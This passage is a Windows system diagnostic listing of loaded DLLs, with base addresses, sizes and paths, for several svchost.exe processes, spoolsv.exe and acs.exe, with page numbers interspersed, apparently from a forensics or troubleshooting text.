0x76f20000 0x25000 C:\WINDOWS\system32\DNSAPI.dll
0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll
0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x71c20000 0x4f000 C:\WINDOWS\system32\NETAPI32.dll
0x71bf0000 0x11000 C:\WINDOWS\system32\SAMLIB.dll
0x71b20000 0x11000 C:\WINDOWS\system32\MPR.dll
0x767a0000 0x13000 C:\WINDOWS\system32\NTDSAPI.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll
0x743b0000 0xd000 C:\WINDOWS\system32\msprivs.dll
0x71cf0000 0x44000 C:\WINDOWS\system32\kerberos.dll
0x76d10000 0x1d000 C:\WINDOWS\system32\msv1_0.dll
0x744b0000 0x63000 C:\WINDOWS\system32\netlogon.dll
0x767c0000 0x2a000 C:\WINDOWS\system32\w32time.dll
0x76080000 0x61000 C:\WINDOWS\system32\MSVCP60.dll
0x76d60000 0x15000 C:\WINDOWS\system32\iphlpapi.dll
0x76de0000 0x26000 C:\WINDOWS\system32\netman.dll
0x76d40000 0x16000 C:\WINDOWS\system32\MPRAPI.dll
0x76e40000 0x2f000 C:\WINDOWS\system32\ACTIVEDS.dll
0x76e10000 0x24000 C:\WINDOWS\system32\adsldpc.dll
0x76b20000 0x15000 C:\WINDOWS\system32\ATL.DLL
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
0x76e80000 0xd000 C:\WINDOWS\system32\rtutils.dll
0x76670000 0xe4000 C:\WINDOWS\system32\SETUPAPI.dll
0x76ee0000 0x37000 C:\WINDOWS\system32\RASAPI32.dll
0x76e90000 0x11000 C:\WINDOWS\system32\rasman.dll
0x76eb0000 0x2a000 C:\WINDOWS\system32\TAPI32.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll
0x76da0000 0x30000 C:\WINDOWS\system32\WZCSvc.DLL
0x76d30000 0x4000 C:\WINDOWS\system32\WMI.dll
0x76d80000 0x1a000 C:\WINDOWS\system32\DHCPCSVC.DLL
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll
0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll
0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll
0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll
0x767f0000 0x24000 C:\WINDOWS\system32\schannel.dll
0x74380000 0xf000 C:\WINDOWS\system32\wdigest.dll
0xffd0000 0x22000 C:\WINDOWS\System32\rsaenh.dll
0x74410000 0x2d000 C:\WINDOWS\system32\scecli.dll
0x743e0000 0x27000 C:\WINDOWS\system32\ipsecsvc.dll
0x745d0000 0xb7000 C:\WINDOWS\system32\oakley.DLL
0x74370000 0xa000 C:\WINDOWS\system32\WINIPSEC.DLL
0x743a0000 0x9000 C:\WINDOWS\system32\pstorsvc.dll
0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll
0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll
0x743c0000 0x17000 C:\WINDOWS\system32\psbase.dll
0xffa0000 0x21000 C:\WINDOWS\System32\dssenh.dll
************************************************************************
svchost.exe pid: 1148
Command line : C:\WINDOWS\system32\svchost -k rpcss
Base Size Path
0x1000000 0x6000 C:\WINDOWS\system32\svchost.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x75850000 0x42000 c:\windows\system32\rpcss.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x71ab0000 0x15000 c:\windows\system32\WS2_32.dll
0x71aa0000 0x8000 c:\windows\system32\WS2HELP.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
106
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x76f90000 0x10000 c:\windows\system32\Secur32.dll
0x75a70000 0xa3000 C:\WINDOWS\system32\userenv.dll
0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll
0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll
0x76f20000 0x25000 C:\WINDOWS\system32\DNSAPI.dll
0x76d60000 0x15000 C:\WINDOWS\system32\iphlpapi.dll
0x76de0000 0x26000 C:\WINDOWS\system32\netman.dll
0x76d40000 0x16000 C:\WINDOWS\system32\MPRAPI.dll
0x76e40000 0x2f000 C:\WINDOWS\system32\ACTIVEDS.dll
0x76e10000 0x24000 C:\WINDOWS\system32\adsldpc.dll
0x71c20000 0x4f000 C:\WINDOWS\system32\NETAPI32.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll
0x76b20000 0x15000 C:\WINDOWS\system32\ATL.DLL
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
0x76e80000 0xd000 C:\WINDOWS\system32\rtutils.dll
0x71bf0000 0x11000 C:\WINDOWS\system32\SAMLIB.dll
0x76670000 0xe4000 C:\WINDOWS\system32\SETUPAPI.dll
0x76ee0000 0x37000 C:\WINDOWS\system32\RASAPI32.dll
0x76e90000 0x11000 C:\WINDOWS\system32\rasman.dll
0x76eb0000 0x2a000 C:\WINDOWS\system32\TAPI32.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll
0x76da0000 0x30000 C:\WINDOWS\system32\WZCSvc.DLL
0x76d30000 0x4000 C:\WINDOWS\system32\WMI.dll
0x76d80000 0x1a000 C:\WINDOWS\system32\DHCPCSVC.DLL
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll
0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll
0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll
0x76fb0000 0x7000 C:\WINDOWS\System32\winrnr.dll
0x76fc0000 0x5000 C:\WINDOWS\system32\rasadhlp.dll
0x76fd0000 0x78000 C:\WINDOWS\system32\CLBCATQ.DLL
0x77050000 0xc5000 C:\WINDOWS\system32\COMRes.dll
0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll
************************************************************************
svchost.exe pid: 1276
Command line : C:\WINDOWS\System32\svchost.exe -k netsvcs
Base Size Path
0x1000000 0x6000 C:\WINDOWS\System32\svchost.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x76bd0000 0x1e000 c:\windows\system32\shsvcs.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\shell32.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll
0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll
0x76360000 0xf000 C:\WINDOWS\System32\WINSTA.dll
0x76d80000 0x1a000 c:\windows\system32\dhcpcsvc.dll
0x76f20000 0x25000 c:\windows\system32\DNSAPI.dll
0x71ab0000 0x15000 c:\windows\system32\WS2_32.dll
0x71aa0000 0x8000 c:\windows\system32\WS2HELP.dll
0x76d60000 0x15000 c:\windows\system32\iphlpapi.dll
0x76de0000 0x26000 c:\windows\system32\netman.dll
0x76d40000 0x16000 c:\windows\system32\MPRAPI.dll
0x76e40000 0x2f000 c:\windows\system32\ACTIVEDS.dll
107
0x76e10000 0x24000 c:\windows\system32\adsldpc.dll
0x71c20000 0x4f000 c:\windows\system32\NETAPI32.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll
0x76b20000 0x15000 c:\windows\system32\ATL.DLL
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
0x76e80000 0xd000 c:\windows\system32\rtutils.dll
0x71bf0000 0x11000 c:\windows\system32\SAMLIB.dll
0x76670000 0xe4000 c:\windows\system32\SETUPAPI.dll
0x76ee0000 0x37000 c:\windows\system32\RASAPI32.dll
0x76e90000 0x11000 c:\windows\system32\rasman.dll
0x76eb0000 0x2a000 c:\windows\system32\TAPI32.dll
0x76b40000 0x2c000 c:\windows\system32\WINMM.dll
0x76f90000 0x10000 c:\windows\system32\Secur32.dll
0x76da0000 0x30000 c:\windows\system32\WZCSvc.DLL
0x76d30000 0x4000 c:\windows\system32\WMI.dll
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x76f50000 0x8000 c:\windows\system32\WTSAPI32.dll
0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll
0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll
0x5ad70000 0x34000 C:\WINDOWS\System32\UxTheme.dll
0xffd0000 0x22000 C:\WINDOWS\System32\rsaenh.dll
0x752d0000 0x3a000 c:\windows\system32\termsrv.dll
0x74f70000 0x5000 c:\windows\system32\ICAAPI.dll
0x76cc0000 0x10000 c:\windows\system32\AUTHZ.dll
0x75110000 0x1c000 c:\windows\system32\mstlsapi.dll
0x76bc0000 0xe000 C:\WINDOWS\System32\REGAPI.dll
0x65f40000 0x1c000 c:\windows\system32\irmon.dll
0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll
0x74f10000 0x10000 C:\WINDOWS\System32\rastls.dll
0x767f0000 0x24000 C:\WINDOWS\System32\SCHANNEL.dll
0x723d0000 0x1a000 C:\WINDOWS\System32\WinSCard.dll
0x74f30000 0xc000 C:\WINDOWS\System32\raschap.dll
0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll
0x58d30000 0x5000 C:\WINDOWS\System32\wshirda.dll
0x76d10000 0x1d000 C:\WINDOWS\system32\msv1_0.dll
0x76ce0000 0x1f000 C:\WINDOWS\System32\NTMARTA.DLL
0x76c90000 0x22000 C:\WINDOWS\system32\IMAGEHLP.dll
0x72460000 0x15000 C:\WINDOWS\System32\rdpwsx.dll
0x73000000 0x23000 C:\WINDOWS\System32\WINSPOOL.DRV
0x76fd0000 0x78000 C:\WINDOWS\System32\CLBCATQ.DLL
0x77050000 0xc5000 C:\WINDOWS\System32\COMRes.dll
0x751d0000 0x29000 c:\windows\system32\schedsvc.dll
0x767a0000 0x13000 c:\windows\system32\NTDSAPI.dll
0x74f50000 0x5000 C:\WINDOWS\System32\MSIDLE.DLL
0x708b0000 0xc000 c:\windows\system32\audiosrv.dll
0x75170000 0x20000 c:\windows\system32\wkssvc.dll
0x74fa0000 0x10000 c:\windows\system32\cryptsvc.dll
0x76c30000 0x2b000 c:\windows\system32\WINTRUST.dll
0x75350000 0x30000 c:\windows\system32\certcli.dll
0x754d0000 0x76000 c:\windows\system32\CRYPTUI.dll
0x76200000 0x97000 C:\WINDOWS\system32\WININET.dll
0x69710000 0xfd000 c:\windows\system32\ESENT.dll
0x74ec0000 0x5000 c:\windows\system32\wuauserv.dll
0x724c0000 0xf000 c:\windows\system32\mspmspsv.dll
0x597a0000 0x1c000 c:\windows\system32\wbem\wmisvc.dll
0x75290000 0x38000 c:\windows\system32\wbem\wbemcomn.dll
0x753e0000 0x68000 C:\WINDOWS\system32\VSSAPI.DLL
0x767c0000 0x2a000 c:\windows\system32\w32time.dll
0x76080000 0x61000 c:\windows\system32\MSVCP60.dll
0x74f40000 0xa000 c:\windows\pchealth\helpctr\binaries\pchsvc.dll
0x75070000 0x16000 c:\windows\system32\trkwks.dll
0x751a0000 0x2a000 c:\windows\system32\srsvc.dll
0x73d20000 0x9000 c:\windows\system32\seclogon.dll
0x74f60000 0xb000 c:\windows\system32\msgsvc.dll
0x75090000 0x17000 c:\windows\system32\srvsvc.dll
0x76b70000 0x3d000 c:\windows\system32\es.dll
0x74f80000 0x8000 c:\windows\system32\ersvc.dll
0x75000000 0x1b000 C:\WINDOWS\System32\wuaueng.dll
0x75260000 0x27000 C:\WINDOWS\System32\ADVPACK.dll
0x76bb0000 0x4000 C:\WINDOWS\System32\sfc.dll
108
0x76c60000 0x29000 C:\WINDOWS\System32\sfc_os.dll
0x722d0000 0xc000 c:\windows\system32\sens.dll
0x75e90000 0xa1000 C:\WINDOWS\System32\SXS.DLL
0x75730000 0x11d000 C:\WINDOWS\system32\comsvcs.dll
0x750f0000 0x12000 C:\WINDOWS\system32\MTXCLU.DLL
0x71ad0000 0x8000 C:\WINDOWS\system32\WSOCK32.dll
0x75130000 0x13000 C:\WINDOWS\system32\colbact.DLL
0x74fc0000 0x10000 C:\WINDOWS\System32\CLUSAPI.DLL
0x750b0000 0x11000 C:\WINDOWS\System32\RESUTILS.DLL
0x750d0000 0x17000 C:\WINDOWS\System32\mtxoci.dll
0x74fe0000 0xf000 c:\windows\system32\browser.dll
0x71c80000 0x6000 C:\WINDOWS\System32\NETRAP.dll
0x75450000 0x77000 C:\WINDOWS\System32\wbem\wbemcore.dll
0x75310000 0x3c000 C:\WINDOWS\System32\wbem\esscli.dll
0x75690000 0x92000 C:\WINDOWS\System32\wbem\FastProx.dll
0x75020000 0x1b000 C:\WINDOWS\System32\wbem\wmiutils.dll
0x75200000 0x24000 C:\WINDOWS\System32\wbem\repdrvfs.dll
0x597f0000 0x67000 C:\WINDOWS\System32\wbem\wmiprvsd.dll
0x5f770000 0xe000 C:\WINDOWS\system32\NCObjAPI.DLL
0x75390000 0x42000 C:\WINDOWS\System32\wbem\wbemess.dll
0x5f740000 0x11000 C:\WINDOWS\System32\wbem\ncprov.dll
0x75cf0000 0x190000 C:\WINDOWS\system32\NETSHELL.dll
0x76c00000 0x2d000 C:\WINDOWS\system32\credui.dll
0x75040000 0x1f000 C:\WINDOWS\System32\upnp.dll
0x74f00000 0xa000 C:\WINDOWS\System32\SSDPAPI.dll
0x68880000 0x3f000 C:\WINDOWS\System32\hnetcfg.dll
0x76fc0000 0x5000 C:\WINDOWS\System32\rasadhlp.dll
0x75550000 0x9e000 C:\WINDOWS\System32\RASDLG.dll
0x58cd0000 0x29000 C:\WINDOWS\System32\wuv3is.dll
0x75150000 0x13000 C:\WINDOWS\System32\Cabinet.dll
0x722b0000 0x5000 C:\WINDOWS\System32\sensapi.dll
0x74ed0000 0xf000 C:\WINDOWS\System32\wbem\wbemsvc.dll
************************************************************************
svchost.exe pid: 1568
Command line : C:\WINDOWS\System32\svchost.exe -k NetworkService
Base Size Path
0x1000000 0x6000 C:\WINDOWS\System32\svchost.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x76770000 0xd000 c:\windows\system32\dnsrslvr.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x76f20000 0x25000 c:\windows\system32\DNSAPI.dll
0x71ab0000 0x15000 c:\windows\system32\WS2_32.dll
0x71aa0000 0x8000 c:\windows\system32\WS2HELP.dll
0x76d60000 0x15000 c:\windows\system32\iphlpapi.dll
0x76de0000 0x26000 c:\windows\system32\netman.dll
0x76d40000 0x16000 c:\windows\system32\MPRAPI.dll
0x76e40000 0x2f000 c:\windows\system32\ACTIVEDS.dll
0x76e10000 0x24000 c:\windows\system32\adsldpc.dll
0x71c20000 0x4f000 c:\windows\system32\NETAPI32.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll
0x76b20000 0x15000 c:\windows\system32\ATL.DLL
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
0x76e80000 0xd000 c:\windows\system32\rtutils.dll
0x71bf0000 0x11000 c:\windows\system32\SAMLIB.dll
0x76670000 0xe4000 c:\windows\system32\SETUPAPI.dll
0x76ee0000 0x37000 c:\windows\system32\RASAPI32.dll
0x76e90000 0x11000 c:\windows\system32\rasman.dll
0x76eb0000 0x2a000 c:\windows\system32\TAPI32.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x76b40000 0x2c000 c:\windows\system32\WINMM.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll
0x76f90000 0x10000 c:\windows\system32\Secur32.dll
109
0x76da0000 0x30000 c:\windows\system32\WZCSvc.DLL
0x76d30000 0x4000 c:\windows\system32\WMI.dll
0x76d80000 0x1a000 c:\windows\system32\DHCPCSVC.DLL
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x76f50000 0x8000 c:\windows\system32\WTSAPI32.dll
0x76360000 0xf000 c:\windows\system32\WINSTA.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll
0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll
0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll
0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll
************************************************************************
svchost.exe pid: 1592
Command line : C:\WINDOWS\System32\svchost.exe -k LocalService
Base Size Path
0x1000000 0x6000 C:\WINDOWS\System32\svchost.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x74c40000 0x6000 c:\windows\system32\lmhsvc.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x76d60000 0x15000 c:\windows\system32\iphlpapi.dll
0x76de0000 0x26000 c:\windows\system32\netman.dll
0x76d40000 0x16000 c:\windows\system32\MPRAPI.dll
0x76e40000 0x2f000 c:\windows\system32\ACTIVEDS.dll
0x76e10000 0x24000 c:\windows\system32\adsldpc.dll
0x71c20000 0x4f000 c:\windows\system32\NETAPI32.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll
0x76b20000 0x15000 c:\windows\system32\ATL.DLL
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
0x76e80000 0xd000 c:\windows\system32\rtutils.dll
0x71bf0000 0x11000 c:\windows\system32\SAMLIB.dll
0x76670000 0xe4000 c:\windows\system32\SETUPAPI.dll
0x76ee0000 0x37000 c:\windows\system32\RASAPI32.dll
0x76e90000 0x11000 c:\windows\system32\rasman.dll
0x71ab0000 0x15000 c:\windows\system32\WS2_32.dll
0x71aa0000 0x8000 c:\windows\system32\WS2HELP.dll
0x76eb0000 0x2a000 c:\windows\system32\TAPI32.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x76b40000 0x2c000 c:\windows\system32\WINMM.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll
0x76f90000 0x10000 c:\windows\system32\Secur32.dll
0x76da0000 0x30000 c:\windows\system32\WZCSvc.DLL
0x76d30000 0x4000 c:\windows\system32\WMI.dll
0x76d80000 0x1a000 c:\windows\system32\DHCPCSVC.DLL
0x76f20000 0x25000 c:\windows\system32\DNSAPI.dll
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x76f50000 0x8000 c:\windows\system32\WTSAPI32.dll
0x76360000 0xf000 c:\windows\system32\WINSTA.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll
0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll
0x5a6e0000 0x14000 c:\windows\system32\webclnt.dll
0x76200000 0x97000 C:\WINDOWS\system32\WININET.dll
0x71ad0000 0x8000 C:\WINDOWS\System32\wsock32.dll
0x74c20000 0x10000 c:\windows\system32\regsvc.dll
0x74c10000 0xd000 c:\windows\system32\ssdpsrv.dll
0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll
0x71a90000 0x8000 C:\WINDOWS\System32\wshtcpip.dll
0x5ad70000 0x34000 C:\WINDOWS\system32\uxtheme.dll
************************************************************************
110
spoolsv.exe pid: 1788
Command line : C:\WINDOWS\system32\spoolsv.exe
Base Size Path
0x1000000 0xf000 C:\WINDOWS\system32\spoolsv.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x742e0000 0x13000 C:\WINDOWS\system32\SPOOLSS.DLL
0x71ab0000 0x15000 C:\WINDOWS\system32\WS2_32.dll
0x71aa0000 0x8000 C:\WINDOWS\system32\WS2HELP.dll
0x76f20000 0x25000 C:\WINDOWS\system32\DNSAPI.dll
0x76fc0000 0x5000 C:\WINDOWS\system32\rasadhlp.dll
0x74320000 0x49000 C:\WINDOWS\system32\localspl.dll
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll
0x76f90000 0x10000 C:\WINDOWS\system32\Secur32.dll
0x76c60000 0x29000 C:\WINDOWS\system32\sfc_os.dll
0x76c30000 0x2b000 C:\WINDOWS\system32\WINTRUST.dll
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x76c90000 0x22000 C:\WINDOWS\system32\IMAGEHLP.dll
0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll
0x73000000 0x23000 C:\WINDOWS\system32\winspool.drv
0x71c20000 0x4f000 C:\WINDOWS\system32\netapi32.dll
0x742a0000 0xe000 C:\WINDOWS\system32\cnbjmon.dll
0x71a50000 0x3b000 C:\WINDOWS\system32\mswsock.dll
0x74280000 0x7000 C:\WINDOWS\system32\pjlmon.dll
0x72400000 0xc000 C:\WINDOWS\system32\tcpmon.dll
0x723f0000 0x7000 C:\WINDOWS\system32\usbmon.dll
0x76fb0000 0x7000 C:\WINDOWS\System32\winrnr.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll
0x742b0000 0x1f000 C:\WINDOWS\system32\win32spl.dll
0x71c80000 0x6000 C:\WINDOWS\system32\NETRAP.dll
0x76fd0000 0x78000 C:\WINDOWS\system32\CLBCATQ.DLL
0x77050000 0xc5000 C:\WINDOWS\system32\COMRes.dll
0x74300000 0x14000 C:\WINDOWS\system32\inetpp.dll
0x74290000 0x4000 C:\WINDOWS\system32\icmp.dll
0x76d60000 0x15000 C:\WINDOWS\system32\iphlpapi.DLL
0x76de0000 0x26000 C:\WINDOWS\system32\netman.dll
0x76d40000 0x16000 C:\WINDOWS\system32\MPRAPI.dll
0x76e40000 0x2f000 C:\WINDOWS\system32\ACTIVEDS.dll
0x76e10000 0x24000 C:\WINDOWS\system32\adsldpc.dll
0x76b20000 0x15000 C:\WINDOWS\system32\ATL.DLL
0x76e80000 0xd000 C:\WINDOWS\system32\rtutils.dll
0x71bf0000 0x11000 C:\WINDOWS\system32\SAMLIB.dll
0x76670000 0xe4000 C:\WINDOWS\system32\SETUPAPI.dll
0x76ee0000 0x37000 C:\WINDOWS\system32\RASAPI32.dll
0x76e90000 0x11000 C:\WINDOWS\system32\rasman.dll
0x76eb0000 0x2a000 C:\WINDOWS\system32\TAPI32.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x76b40000 0x2c000 C:\WINDOWS\system32\WINMM.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll
0x76da0000 0x30000 C:\WINDOWS\system32\WZCSvc.DLL
0x76d30000 0x4000 C:\WINDOWS\system32\WMI.dll
0x76d80000 0x1a000 C:\WINDOWS\system32\DHCPCSVC.DLL
0x76f50000 0x8000 C:\WINDOWS\system32\WTSAPI32.dll
0x76360000 0xf000 C:\WINDOWS\system32\WINSTA.dll
0x71950000 0xe4000 C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-
Controls_6595b64144ccf1df_6.0.0.0_x-ww_1382d70a\comctl32.dll
0x77340000 0x8b000 C:\WINDOWS\system32\comctl32.dll
************************************************************************
acs.exe pid: 1960
Command line : C:\WINDOWS\System32\acs.exe
111
Base Size Path
0x400000 0x74000 C:\WINDOWS\System32\acs.exe
0x77f50000 0xa9000 C:\WINDOWS\System32\ntdll.dll
0x77e60000 0xe5000 C:\WINDOWS\system32\kernel32.dll
0x10000000 0x4c000 C:\WINDOWS\System32\athcfg20U.dll
0x74ae0000 0x7000 C:\WINDOWS\System32\CFGMGR32.dll
0x76670000 0xe4000 C:\WINDOWS\System32\setupapi.dll
0x77c10000 0x53000 C:\WINDOWS\system32\msvcrt.dll
0x77dd0000 0x8b000 C:\WINDOWS\system32\ADVAPI32.dll
0x77cc0000 0x75000 C:\WINDOWS\system32\RPCRT4.dll
0x77c70000 0x40000 C:\WINDOWS\system32\GDI32.dll
0x77d40000 0x8d000 C:\WINDOWS\system32\USER32.dll
0x76d60000 0x15000 C:\WINDOWS\System32\iphlpapi.dll
0x76de0000 0x26000 C:\WINDOWS\System32\netman.dll
0x76d40000 0x16000 C:\WINDOWS\System32\MPRAPI.dll
0x76e40000 0x2f000 C:\WINDOWS\System32\ACTIVEDS.dll
0x76e10000 0x24000 C:\WINDOWS\System32\adsldpc.dll
0x71c20000 0x4f000 C:\WINDOWS\System32\NETAPI32.dll
0x76f60000 0x2c000 C:\WINDOWS\system32\WLDAP32.dll
0x76b20000 0x15000 C:\WINDOWS\System32\ATL.DLL
0x771b0000 0x11a000 C:\WINDOWS\system32\ole32.dll
0x77120000 0x8b000 C:\WINDOWS\system32\OLEAUT32.dll
0x76e80000 0xd000 C:\WINDOWS\System32\rtutils.dll
0x71bf0000 0x11000 C:\WINDOWS\System32\SAMLIB.dll
0x76ee0000 0x37000 C:\WINDOWS\System32\RASAPI32.dll
0x76e90000 0x11000 C:\WINDOWS\System32\rasman.dll
0x71ab0000 0x15000 C:\WINDOWS\System32\WS2_32.dll
0x71aa0000 0x8000 C:\WINDOWS\System32\WS2HELP.dll
0x76eb0000 0x2a000 C:\WINDOWS\System32\TAPI32.dll
0x772d0000 0x63000 C:\WINDOWS\system32\SHLWAPI.dll
0x76b40000 0x2c000 C:\WINDOWS\System32\WINMM.dll
0x773d0000 0x7f4000 C:\WINDOWS\system32\SHELL32.dll
0x76f90000 0x10000 C:\WINDOWS\System32\Secur32.dll
0x76da0000 0x30000 C:\WINDOWS\System32\WZCSvc.DLL
0x76d30000 0x4000 C:\WINDOWS\System32\WMI.dll
0x76d80000 0x1a000 C:\WINDOWS\System32\DHCPCSVC.DLL
0x76f20000 0x25000 C:\WINDOWS\System32\DNSAPI.dll
0x762c0000 0x8a000 C:\WINDOWS\system32\CRYPT32.dll
0x762a0000 0xf000 C:\WINDOWS\system32\MSASN1.dll
0x76f50000 0x8000 C:\WINDOWS\System32\WTSAPI32.dll
0x76360000 0xf000 C:\WINDOWS\System32\WINSTA.dll
0x77c00000 0x7000 C:\WINDOWS\system32\VERSION.dll
0x75a70000 0xa3000 C:\WINDOWS\system32\USERENV.dll
0x71ad0000 0x8000 C:\WINDOWS\System32\WSOCK32.dll
0x72830000 0xf2000 C:\WINDOWS\System32\MFC42u.DLL
0x340000 0x1f000 C:\WINDOWS\System32\athcfg20ResU.dll
0x76bf0000 0xb000 C:\WINDOWS\System32\PSAPI.DLL
